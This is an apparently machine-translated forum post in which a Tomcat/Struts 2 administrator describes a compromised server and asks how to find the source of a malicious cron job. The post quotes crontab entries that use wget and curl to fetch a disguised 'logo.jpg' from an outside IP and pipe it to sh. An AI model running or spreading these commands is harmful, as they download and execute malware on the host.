通过未知来源的cron对Apache服务器进行Shell脚本攻击
在Apache tomcat服务器上运行项目大战时,我发现该服务器已受到威胁。 在对未知分子进行战争时,cron像这样 [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh 下载的文件logo.jpg带有正在下载恶意软件的外壳程序脚本。 我在下面的这个网站上发现了类似的问题 https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/ 和 /security/160068/kworker34-malware-on-linux 我无法在整个代码中找到此cron调度程序的来源。 我想知道有人遇到过这个问题吗?以及如何在代码中查找调度程序的来源。 注意: 我正在研究JAVA(Struts 2)+ jsp + javascript + jquery Web项目。 每次我使用项目的war文件启动tomcat时,都会运行此调度程序,但是我无法在代码中找到任何用于调度程序的调度程序。 我在日志文件中找到了以下行 [INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - …